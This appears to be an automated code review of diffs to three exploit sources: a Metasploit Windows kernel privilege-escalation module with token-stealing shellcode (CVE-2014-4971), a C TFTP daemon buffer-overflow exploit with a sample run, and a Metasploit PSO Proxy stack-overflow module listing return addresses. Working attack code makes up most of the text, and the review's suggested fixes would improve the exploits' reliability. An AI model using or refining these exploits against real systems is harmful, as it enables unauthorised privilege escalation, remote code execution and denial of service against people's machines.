[ \'URL\', \'https://www.korelogic.com/Resources/Advisories/KL-001-2014-003.txt\' ]
|
||||
[ 'CVE', '2014-4971' ],
|
||||
[ 'EDB', '34112' ],
|
||||
[ 'URL', 'https://www.korelogic.com/Resources/Advisories/KL-001-2014-003.txt' ]
|
||||
],
|
||||
\'DisclosureDate\'=> \'Jul 22 2014\',
|
||||
\'DefaultTarget\' => 0
|
||||
'DisclosureDate'=> 'Jul 22 2014',
|
||||
'DefaultTarget' => 0
|
||||
}))
|
||||
end
|
||||
|
||||
def find_sys_base(drvname)
|
||||
session.railgun.add_dll(\'psapi\') if not session.railgun.dlls.keys.include?(\'psapi\')
|
||||
session.railgun.add_function(\'psapi\', \'EnumDeviceDrivers\', \'BOOL\', [ [\"PBLOB\", \"lpImageBase\", \"out\"], [\"DWORD\", \"cb\", \"in\"], [\"PDWORD\", \"lpcbNeeded\", \"out\"]])
|
||||
session.railgun.add_function(\'psapi\', \'GetDeviceDriverBaseNameA\', \'DWORD\', [ [\"LPVOID\", \"ImageBase\", \"in\"], [\"PBLOB\", \"lpBaseName\", \"out\"], [\"DWORD\", \"nSize\", \"in\"]])
|
||||
session.railgun.add_dll('psapi') if not session.railgun.dlls.keys.include?('psapi')
|
||||
session.railgun.add_function('psapi', 'EnumDeviceDrivers', 'BOOL', [ ["PBLOB", "lpImageBase", "out"], ["DWORD", "cb", "in"], ["PDWORD", "lpcbNeeded", "out"]])
|
||||
session.railgun.add_function('psapi', 'GetDeviceDriverBaseNameA', 'DWORD', [ ["LPVOID", "ImageBase", "in"], ["PBLOB", "lpBaseName", "out"], ["DWORD", "nSize", "in"]])
|
||||
results = session.railgun.psapi.EnumDeviceDrivers(4096, 1024, 4)
|
||||
addresses = results[\'lpImageBase\'][0..results[\'lpcbNeeded\'] - 1].unpack(\"L*\")
|
||||
addresses = results['lpImageBase'][0..results['lpcbNeeded'] - 1].unpack("L*")
|
||||
|
||||
addresses.each do |address|
|
||||
results = session.railgun.psapi.GetDeviceDriverBaseNameA(address, 48, 48)
|
||||
current_drvname = results[\'lpBaseName\'][0..results[\'return\'] - 1]
|
||||
current_drvname = results['lpBaseName'][0..results['return'] - 1]
|
||||
if drvname == nil
|
||||
if current_drvname.downcase.include?(\'krnl\')
|
||||
if current_drvname.downcase.include?('krnl')
|
||||
return [address, current_drvname]
|
||||
end
|
||||
elsif drvname == results[\'lpBaseName\'][0..results[\'return\'] - 1]
|
||||
elsif drvname == results['lpBaseName'][0..results['return'] - 1]
|
||||
return [address, current_drvname]
|
||||
end
|
||||
end
|
||||
|
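Review bot: `find_sys_base` recomputes the driver name in the `elsif` branch (`drvname == results['lpBaseName'][0..results['return'] - 1]`) even though `current_drvname` already holds exactly that value; compare against `current_drvname`. Two style points in the same function: `if drvname == nil` reads better as `drvname.nil?`, and `add_dll('psapi') if not ...include?('psapi')` as `unless`. The unescaping of the target offsets (`"\x44"`, `"\xc8"`, `"\x84"`, `"\x88"`) keeps each as a single byte, which is what the shellcode concatenations in the exploit method expect.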
@ -80,29 +80,29 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
# Function borrowed from smart_hashdump
|
||||
def get_system_proc
|
||||
# Make sure you got the correct SYSTEM Account Name no matter the OS Language
|
||||
local_sys = resolve_sid(\"S-1-5-18\")
|
||||
system_account_name = \"#{local_sys[:domain]}\\\\#{local_sys[:name]}\"
|
||||
local_sys = resolve_sid("S-1-5-18")
|
||||
system_account_name = "#{local_sys[:domain]}\\#{local_sys[:name]}"
|
||||
|
||||
this_pid = session.sys.process.getpid
|
||||
# Processes that can Blue Screen a host if migrated in to
|
||||
dangerous_processes = [\"lsass.exe\", \"csrss.exe\", \"smss.exe\"]
|
||||
dangerous_processes = ["lsass.exe", "csrss.exe", "smss.exe"]
|
||||
session.sys.process.processes.each do |p|
|
||||
# Check we are not migrating to a process that can BSOD the host
|
||||
next if dangerous_processes.include?(p[\"name\"])
|
||||
next if p[\"pid\"] == this_pid
|
||||
next if p[\"pid\"] == 4
|
||||
next if p[\"user\"] != system_account_name
|
||||
next if dangerous_processes.include?(p["name"])
|
||||
next if p["pid"] == this_pid
|
||||
next if p["pid"] == 4
|
||||
next if p["user"] != system_account_name
|
||||
return p
|
||||
end
|
||||
end
|
||||
|
||||
def open_device
|
||||
handle = session.railgun.kernel32.CreateFileA(\"\\\\\\\\.\\\\MQAC\", \"FILE_SHARE_WRITE|FILE_SHARE_READ\", 0, nil, \"OPEN_EXISTING\", 0, nil)
|
||||
if handle[\'return\'] == 0
|
||||
print_error(\'Failed to open the \\\\\\\\.\\\\MQAC device\')
|
||||
handle = session.railgun.kernel32.CreateFileA("\\\\.\\MQAC", "FILE_SHARE_WRITE|FILE_SHARE_READ", 0, nil, "OPEN_EXISTING", 0, nil)
|
||||
if handle['return'] == 0
|
||||
print_error('Failed to open the \\\\.\\MQAC device')
|
||||
return nil
|
||||
end
|
||||
handle = handle[\'return\']
|
||||
handle = handle['return']
|
||||
end
|
||||
|
||||
def check
|
||||
|
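Review bot: in `open_device`, `"FILE_SHARE_WRITE|FILE_SHARE_READ"` is passed in the second `CreateFileA` position, which is `dwDesiredAccess`, while the third argument (`dwShareMode`, where those names belong) is `0`. The call works only because the numeric value happens to equal FILE_READ_DATA|FILE_WRITE_DATA, so use access-mask constants there to avoid misleading the reader. Also the final `handle = handle['return']` assignment exists only to be the method's return value; `handle['return']` alone is clearer. The path unescaping is right: `"\\\\.\\MQAC"` in the double-quoted string and `'\\\\.\\MQAC'` in the single-quoted one both evaluate to `\\.\MQAC`.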
@ -112,7 +112,7 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
end
|
||||
session.railgun.kernel32.CloseHandle(handle)
|
||||
|
||||
os = sysinfo[\"OS\"]
|
||||
os = sysinfo["OS"]
|
||||
case os
|
||||
when /windows xp.*service pack 3/i
|
||||
return Exploit::CheckCode::Appears
|
||||
|
@ -124,79 +124,79 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
end
|
||||
|
||||
def exploit
|
||||
if sysinfo[\"Architecture\"] =~ /wow64/i
|
||||
print_error(\"Running against WOW64 is not supported\")
|
||||
if sysinfo["Architecture"] =~ /wow64/i
|
||||
print_error("Running against WOW64 is not supported")
|
||||
return
|
||||
elsif sysinfo[\"Architecture\"] =~ /x64/
|
||||
print_error(\"Running against 64-bit systems is not supported\")
|
||||
elsif sysinfo["Architecture"] =~ /x64/
|
||||
print_error("Running against 64-bit systems is not supported")
|
||||
return
|
||||
end
|
||||
|
||||
if is_system?
|
||||
print_error(\"This meterpreter session is already running as SYSTEM\")
|
||||
print_error("This meterpreter session is already running as SYSTEM")
|
||||
return
|
||||
end
|
||||
|
||||
kernel_info = find_sys_base(nil)
|
||||
base_addr = 0xffff
|
||||
print_status(\"Kernel Base Address: 0x#{kernel_info[0].to_s(16)}\")
|
||||
print_status("Kernel Base Address: 0x#{kernel_info[0].to_s(16)}")
|
||||
|
||||
handle = open_device
|
||||
return if handle.nil?
|
||||
|
||||
this_proc = session.sys.process.open
|
||||
unless this_proc.memory.writable?(base_addr)
|
||||
session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ 1 ].pack(\"L\"), nil, [ 0xffff ].pack(\"L\"), \"MEM_COMMIT|MEM_RESERVE\", \"PAGE_EXECUTE_READWRITE\")
|
||||
session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ 1 ].pack("L"), nil, [ 0xffff ].pack("L"), "MEM_COMMIT|MEM_RESERVE", "PAGE_EXECUTE_READWRITE")
|
||||
end
|
||||
unless this_proc.memory.writable?(base_addr)
|
||||
print_error(\'Failed to properly allocate memory\')
|
||||
print_error('Failed to properly allocate memory')
|
||||
this_proc.close
|
||||
return
|
||||
end
|
||||
|
||||
hKernel = session.railgun.kernel32.LoadLibraryExA(kernel_info[1], 0, 1)
|
||||
hKernel = hKernel[\'return\']
|
||||
halDispatchTable = session.railgun.kernel32.GetProcAddress(hKernel, \"HalDispatchTable\")
|
||||
halDispatchTable = halDispatchTable[\'return\']
|
||||
hKernel = hKernel['return']
|
||||
halDispatchTable = session.railgun.kernel32.GetProcAddress(hKernel, "HalDispatchTable")
|
||||
halDispatchTable = halDispatchTable['return']
|
||||
halDispatchTable -= hKernel
|
||||
halDispatchTable += kernel_info[0]
|
||||
print_status(\"HalDisPatchTable Address: 0x#{halDispatchTable.to_s(16)}\")
|
||||
print_status("HalDisPatchTable Address: 0x#{halDispatchTable.to_s(16)}")
|
||||
|
||||
tokenstealing = \"\\x52\" # push edx # Save edx on the stack
|
||||
tokenstealing << \"\\x53\" # push ebx # Save ebx on the stack
|
||||
tokenstealing << \"\\x33\\xc0\" # xor eax, eax # eax = 0
|
||||
tokenstealing << \"\\x64\\x8b\\x80\\x24\\x01\\x00\\x00\" # mov eax, dword ptr fs:[eax+124h] # Retrieve ETHREAD
|
||||
tokenstealing << \"\\x8b\\x40\" + target[\'_KPROCESS\'] # mov eax, dword ptr [eax+44h] # Retrieve _KPROCESS
|
||||
tokenstealing << \"\\x8b\\xc8\" # mov ecx, eax
|
||||
tokenstealing << \"\\x8b\\x98\" + target[\'_TOKEN\'] + \"\\x00\\x00\\x00\" # mov ebx, dword ptr [eax+0C8h] # Retrieves TOKEN
|
||||
tokenstealing << \"\\x8b\\x80\" + target[\'_APLINKS\'] + \"\\x00\\x00\\x00\" # mov eax, dword ptr [eax+88h] <====| # Retrieve FLINK from ActiveProcessLinks
|
||||
tokenstealing << \"\\x81\\xe8\" + target[\'_APLINKS\'] + \"\\x00\\x00\\x00\" # sub eax,88h | # Retrieve _EPROCESS Pointer from the ActiveProcessLinks
|
||||
tokenstealing << \"\\x81\\xb8\" + target[\'_UPID\'] + \"\\x00\\x00\\x00\\x04\\x00\\x00\\x00\" # cmp dword ptr [eax+84h], 4 | # Compares UniqueProcessId with 4 (The System Process on Windows XP)
|
||||
tokenstealing << \"\\x75\\xe8\" # jne 0000101e ======================
|
||||
tokenstealing << \"\\x8b\\x90\" + target[\'_TOKEN\'] + \"\\x00\\x00\\x00\" # mov edx,dword ptr [eax+0C8h] # Retrieves TOKEN and stores on EDX
|
||||
tokenstealing << \"\\x8b\\xc1\" # mov eax, ecx # Retrieves KPROCESS stored on ECX
|
||||
tokenstealing << \"\\x89\\x90\" + target[\'_TOKEN\'] + \"\\x00\\x00\\x00\" # mov dword ptr [eax+0C8h],edx # Overwrites the TOKEN for the current KPROCESS
|
||||
tokenstealing << \"\\x5b\" # pop ebx # Restores ebx
|
||||
tokenstealing << \"\\x5a\" # pop edx # Restores edx
|
||||
tokenstealing << \"\\xc2\\x10\" # ret 10h # Away from the kernel!
|
||||
tokenstealing = "\x52" # push edx # Save edx on the stack
|
||||
tokenstealing << "\x53" # push ebx # Save ebx on the stack
|
||||
tokenstealing << "\x33\xc0" # xor eax, eax # eax = 0
|
||||
tokenstealing << "\x64\x8b\x80\x24\x01\x00\x00" # mov eax, dword ptr fs:[eax+124h] # Retrieve ETHREAD
|
||||
tokenstealing << "\x8b\x40" + target['_KPROCESS'] # mov eax, dword ptr [eax+44h] # Retrieve _KPROCESS
|
||||
tokenstealing << "\x8b\xc8" # mov ecx, eax
|
||||
tokenstealing << "\x8b\x98" + target['_TOKEN'] + "\x00\x00\x00" # mov ebx, dword ptr [eax+0C8h] # Retrieves TOKEN
|
||||
tokenstealing << "\x8b\x80" + target['_APLINKS'] + "\x00\x00\x00" # mov eax, dword ptr [eax+88h] <====| # Retrieve FLINK from ActiveProcessLinks
|
||||
tokenstealing << "\x81\xe8" + target['_APLINKS'] + "\x00\x00\x00" # sub eax,88h | # Retrieve _EPROCESS Pointer from the ActiveProcessLinks
|
||||
tokenstealing << "\x81\xb8" + target['_UPID'] + "\x00\x00\x00\x04\x00\x00\x00" # cmp dword ptr [eax+84h], 4 | # Compares UniqueProcessId with 4 (The System Process on Windows XP)
|
||||
tokenstealing << "\x75\xe8" # jne 0000101e ======================
|
||||
tokenstealing << "\x8b\x90" + target['_TOKEN'] + "\x00\x00\x00" # mov edx,dword ptr [eax+0C8h] # Retrieves TOKEN and stores on EDX
|
||||
tokenstealing << "\x8b\xc1" # mov eax, ecx # Retrieves KPROCESS stored on ECX
|
||||
tokenstealing << "\x89\x90" + target['_TOKEN'] + "\x00\x00\x00" # mov dword ptr [eax+0C8h],edx # Overwrites the TOKEN for the current KPROCESS
|
||||
tokenstealing << "\x5b" # pop ebx # Restores ebx
|
||||
tokenstealing << "\x5a" # pop edx # Restores edx
|
||||
tokenstealing << "\xc2\x10" # ret 10h # Away from the kernel!
|
||||
|
||||
shellcode = make_nops(0x200) + tokenstealing
|
||||
this_proc.memory.write(0x1, shellcode)
|
||||
this_proc.close
|
||||
|
||||
print_status(\"Triggering vulnerable IOCTL\")
|
||||
print_status("Triggering vulnerable IOCTL")
|
||||
session.railgun.ntdll.NtDeviceIoControlFile(handle, 0, 0, 0, 4, 0x1965020f, 1, 0x258, halDispatchTable + 0x4, 0)
|
||||
result = session.railgun.ntdll.NtQueryIntervalProfile(1337, 4)
|
||||
|
||||
unless is_system?
|
||||
print_error(\"Exploit failed\")
|
||||
print_error("Exploit failed")
|
||||
return
|
||||
end
|
||||
|
||||
proc = get_system_proc
|
||||
print_status(\"Injecting the payload into SYSTEM process: #{proc[\'name\']}\")
|
||||
unless execute_shellcode(payload.encoded, nil, proc[\'pid\'])
|
||||
fail_with(Failure::Unknown, \"Error while executing the payload\")
|
||||
print_status("Injecting the payload into SYSTEM process: #{proc['name']}")
|
||||
unless execute_shellcode(payload.encoded, nil, proc['pid'])
|
||||
fail_with(Failure::Unknown, "Error while executing the payload")
|
||||
end
|
||||
end
|
||||
|
||||
|
|
|
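Review bot: `kernel_info = find_sys_base(nil)` is indexed immediately (`kernel_info[0]`, `kernel_info[1]`) without checking that a kernel image was actually found; guard it and `fail_with` rather than letting a NoMethodError surface. Smaller points in the same method: `result = session.railgun.ntdll.NtQueryIntervalProfile(1337, 4)` assigns a value that is never read; the device handle returned by `open_device` is never closed on any path through `exploit` (the `check` method does call `CloseHandle`); and `base_addr = 0xffff` is what `writable?` tests while the shellcode is written at `0x1`, which deserves a comment explaining why the `NtAllocateVirtualMemory` request at base address 1 with size 0xffff is what makes that low range writable. The shellcode byte strings survive the unescaping intact (`"\x64\x8b\x80\x24\x01\x00\x00"` and the `target[...]` offset concatenations).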
@ -14,43 +14,43 @@
|
|||
#include <stdio.h>
|
||||
#include <windows.h>
|
||||
|
||||
#pragma comment(lib, \"ws2_32.lib\")
|
||||
#pragma comment(lib, "ws2_32.lib")
|
||||
|
||||
char Buffer_Overflow[] =
|
||||
\"\\x00\\x02\"
|
||||
\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\" // A = 41. 300 bytes...
|
||||
\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"
|
||||
\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"
|
||||
\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"
|
||||
\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"
|
||||
\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"
|
||||
\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"
|
||||
\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"
|
||||
\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"
|
||||
\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"
|
||||
\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"
|
||||
\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"
|
||||
\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"
|
||||
\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"
|
||||
\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"
|
||||
\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"
|
||||
\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"
|
||||
\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"
|
||||
\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"
|
||||
\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"
|
||||
\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"
|
||||
\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"
|
||||
\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"
|
||||
\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"
|
||||
\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"
|
||||
\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"
|
||||
\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"
|
||||
\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"
|
||||
\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"
|
||||
\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"
|
||||
\"\\0\"
|
||||
\"netascii\"
|
||||
\"\\0\";
|
||||
"\x00\x02"
|
||||
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" // A = 41. 300 bytes...
|
||||
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||
"\0"
|
||||
"netascii"
|
||||
"\0";
|
||||
|
||||
void main(int argc, char *argv[])
|
||||
{
|
||||
|
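Review bot: `void main(int argc, char *argv[])` is not standard C; declare `int main` and return a status, which also lets the `exit(1)` error paths in the body be replaced consistently. The payload layout is otherwise readable: opcode `"\x00\x02"` (WRQ), the 300 `\x41` bytes the comment announces, then `"\0" "netascii" "\0"`. The unescaped `"\x41\x41..."` lines are byte-for-byte the same as the old `\"\\x41\\x41...\"` form.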
@ -62,52 +62,52 @@ SOCKET mysocket;
|
|||
int destPORT = 69;
|
||||
|
||||
if (argc < 2){
|
||||
printf(\"\\nVulnerability: Remote Buffer Overflow Exploit\\n\");
|
||||
printf(\"Impact: Remote Denial of Service Attack\\n\");
|
||||
printf(\"Vulnerable Application: TFTP Daemon Version 1.9\\n\");
|
||||
printf(\"\\nAuthor: Socket_0x03\\n\");
|
||||
printf(\"Contact: Socket_0x03 (at) teraexe (dot) com [email concealed]\\n\");
|
||||
printf(\"Website: www.teraexe.com\\n\");
|
||||
printf(\"\\nUsage: exploit + IP Address\\n\");
|
||||
printf(\"Example: exploit 192.168.1.100\\n\");
|
||||
printf("\nVulnerability: Remote Buffer Overflow Exploit\n");
|
||||
printf("Impact: Remote Denial of Service Attack\n");
|
||||
printf("Vulnerable Application: TFTP Daemon Version 1.9\n");
|
||||
printf("\nAuthor: Socket_0x03\n");
|
||||
printf("Contact: Socket_0x03 (at) teraexe (dot) com [email concealed]\n");
|
||||
printf("Website: www.teraexe.com\n");
|
||||
printf("\nUsage: exploit + IP Address\n");
|
||||
printf("Example: exploit 192.168.1.100\n");
|
||||
return;
|
||||
}
|
||||
|
||||
wVersionRequested = MAKEWORD(1, 1);
|
||||
if (WSAStartup(wVersionRequested, &wsaData) < 0) {
|
||||
printf(\"No winsock suitable version found!\");
|
||||
printf("No winsock suitable version found!");
|
||||
return;
|
||||
}
|
||||
mysocket = socket(AF_INET, SOCK_DGRAM , 0);
|
||||
if(mysocket==INVALID_SOCKET){
|
||||
printf(\"Error: Cannot create a socket.\\n\");
|
||||
printf("Error: Cannot create a socket.\n");
|
||||
exit(1);
|
||||
}
|
||||
printf(\"Resolving IP Address.\\n\");
|
||||
printf("Resolving IP Address.\n");
|
||||
if ((pTarget = gethostbyname(argv[2])) == NULL){
|
||||
printf(\"Error: Resolve of %s failed.\\n\", argv[1]);
|
||||
printf("Error: Resolve of %s failed.\n", argv[1]);
|
||||
exit(1);
|
||||
}
|
||||
memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
|
||||
sock.sin_family = AF_INET;
|
||||
sock.sin_port = htons(destPORT);
|
||||
|
||||
printf(\"Connecting to Daemon 1.9\\n\");
|
||||
printf("Connecting to Daemon 1.9\n");
|
||||
if ( (connect(mysocket, (struct sockaddr *)&sock, sizeof (sock) ))){
|
||||
printf(\"Error: Could not connect to TFTP Daemon\\n\");
|
||||
printf("Error: Could not connect to TFTP Daemon\n");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
printf(\"Connection Completed.\\n\");
|
||||
printf("Connection Completed.\n");
|
||||
Sleep(10);
|
||||
|
||||
printf(\"Sending packet.\\n\");
|
||||
printf("Sending packet.\n");
|
||||
if (send(mysocket,Buffer_Overflow, sizeof(Buffer_Overflow)+1, 0) == -1){
|
||||
printf(\"Error sending packet.\\n\");
|
||||
printf("Error sending packet.\n");
|
||||
closesocket(mysocket);
|
||||
exit(1);
|
||||
}
|
||||
printf(\"Remote Buffer Overflow Completed.\\n\");
|
||||
printf("Remote Buffer Overflow Completed.\n");
|
||||
|
||||
closesocket(mysocket);
|
||||
WSACleanup();
|
||||
|
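Review bot: `gethostbyname(argv[2])` reads past the only argument the usage block asks for (`exploit 192.168.1.100`, checked with `argc < 2`), so with one argument it passes a NULL `argv[2]`, and the error message then prints `argv[1]`; both should be `argv[1]`. Also `send(mysocket, Buffer_Overflow, sizeof(Buffer_Overflow)+1, 0)` sends one byte past the array, since `sizeof` already includes the terminating NUL; drop the `+1`. Minor: `WSAStartup` returns a nonzero error code on failure, not a negative value, so `< 0` never catches an error.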
@ -117,7 +117,7 @@ WSACleanup();
|
|||
Microsoft Windows XP [Versión 5.1.2600]
|
||||
(C) Copyright 1985-2001 Microsoft Corp.
|
||||
|
||||
C:\\>exploit
|
||||
C:\>exploit
|
||||
|
||||
Vulnerability: Remote Buffer Overflow Exploit
|
||||
Impact: Remote Denial of Service Attack
|
||||
|
@ -130,12 +130,12 @@ Website: www.teraexe.com
|
|||
Usage: exploit + IP Address
|
||||
Example: exploit 192.168.1.100
|
||||
|
||||
C:\\>exploit 192.168.1.101
|
||||
C:\>exploit 192.168.1.101
|
||||
Resolving IP Address.
|
||||
Connecting to Daemon 1.9
|
||||
Connection Completed.
|
||||
Sending packet.
|
||||
Remote Buffer Overflow Completed.
|
||||
|
||||
C:\\>
|
||||
C:\>
|
||||
*/
|
|
@ -18,43 +18,43 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
\'Name\' => \'PSO Proxy v0.91 Stack Buffer Overflow\',
|
||||
\'Description\' => %q{
|
||||
'Name' => 'PSO Proxy v0.91 Stack Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a buffer overflow in the PSO Proxy v0.91 web server.
|
||||
If a client sends an excessively long string the stack is overwritten.
|
||||
},
|
||||
\'Author\' => \'Patrick Webster <patrick@aushack.com>\',
|
||||
\'License\' => MSF_LICENSE,
|
||||
\'Version\' => \'$Revision: 9262 $\',
|
||||
\'References\' =>
|
||||
'Author' => 'Patrick Webster <patrick@aushack.com>',
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision: 9262 $',
|
||||
'References' =>
|
||||
[
|
||||
[ \'CVE\', \'2004-0313\' ],
|
||||
[ \'OSVDB\', \'4028\' ],
|
||||
[ \'URL\', \'http://www.milw0rm.com/exploits/156\' ],
|
||||
[ \'BID\', \'9706\' ],
|
||||
[ 'CVE', '2004-0313' ],
|
||||
[ 'OSVDB', '4028' ],
|
||||
[ 'URL', 'http://www.milw0rm.com/exploits/156' ],
|
||||
[ 'BID', '9706' ],
|
||||
],
|
||||
\'DefaultOptions\' =>
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
\'EXITFUNC\' => \'thread\',
|
||||
'EXITFUNC' => 'thread',
|
||||
},
|
||||
\'Payload\' =>
|
||||
'Payload' =>
|
||||
{
|
||||
\'Space\' => 370,
|
||||
\'BadChars\' => \"\\x00\\x0a\\x0d\\x20\",
|
||||
\'StackAdjustment\' => -3500,
|
||||
'Space' => 370,
|
||||
'BadChars' => "\x00\x0a\x0d\x20",
|
||||
'StackAdjustment' => -3500,
|
||||
},
|
||||
\'Platform\' => \'win\',
|
||||
\'Targets\' =>
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
# Patrick - Tested OK 2007/09/06 against w2ksp0, w2ksp4, xpsp0,xpsp2 en.
|
||||
[ \'Windows 2000 Pro SP0-4 English\', { \'Ret\' => 0x75023112 } ], # call ecx ws2help.dll
|
||||
[ \'Windows 2000 Pro SP0-4 French\', { \'Ret\' => 0x74fa3112 } ], # call ecx ws2help.dll
|
||||
[ \'Windows 2000 Pro SP0-4 Italian\', { \'Ret\' => 0x74fd3112 } ], # call ecx ws2help.dll
|
||||
[ \'Windows XP Pro SP0/1 English\', { \'Ret\' => 0x71aa396d } ], # call ecx ws2help.dll
|
||||
[ \'Windows XP Pro SP2 English\', { \'Ret\' => 0x71aa3de3 } ], # call ecx ws2help.dll
|
||||
[ 'Windows 2000 Pro SP0-4 English', { 'Ret' => 0x75023112 } ], # call ecx ws2help.dll
|
||||
[ 'Windows 2000 Pro SP0-4 French', { 'Ret' => 0x74fa3112 } ], # call ecx ws2help.dll
|
||||
[ 'Windows 2000 Pro SP0-4 Italian', { 'Ret' => 0x74fd3112 } ], # call ecx ws2help.dll
|
||||
[ 'Windows XP Pro SP0/1 English', { 'Ret' => 0x71aa396d } ], # call ecx ws2help.dll
|
||||
[ 'Windows XP Pro SP2 English', { 'Ret' => 0x71aa3de3 } ], # call ecx ws2help.dll
|
||||
],
|
||||
\'Privileged\' => false,
|
||||
\'DisclosureDate\' => \'Feb 20 2004\'
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => 'Feb 20 2004'
|
||||
))
|
||||
|
||||
register_options(
|
||||
|
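Review bot: `'Version' => '$Revision: 9262 $'` is a leftover Subversion keyword that the framework no longer expands; drop the key. The `Targets` comment (`Tested OK 2007/09/06 against w2ksp0, w2ksp4, xpsp0,xpsp2 en.`) is good documentation; it would be worth adding that the `call ecx` addresses in ws2help.dll are language-specific, as the three Windows 2000 entries already show. The `BadChars` string becomes `"\x00\x0a\x0d\x20"` after unescaping, unchanged in value.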
@ -65,9 +65,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def check
|
||||
connect
|
||||
sock.put(\"GET / HTTP/1.0\\r\\n\\r\\n\")
|
||||
sock.put("GET / HTTP/1.0\r\n\r\n")
|
||||
banner = sock.get(-1,3)
|
||||
if (banner =~ /PSO Proxy 0\\.9/)
|
||||
if (banner =~ /PSO Proxy 0\.9/)
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
end
|
||||
return Exploit::CheckCode::Safe
|
||||
|
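Review bot: `check` returns `Exploit::CheckCode::Vulnerable` on a banner match alone (`banner =~ /PSO Proxy 0\.9/`); by framework convention a version-string match that does not exercise the bug is `Exploit::CheckCode::Appears`. Also the socket opened by `connect` is not disconnected before either `return`.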
@ -77,9 +77,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
connect
|
||||
|
||||
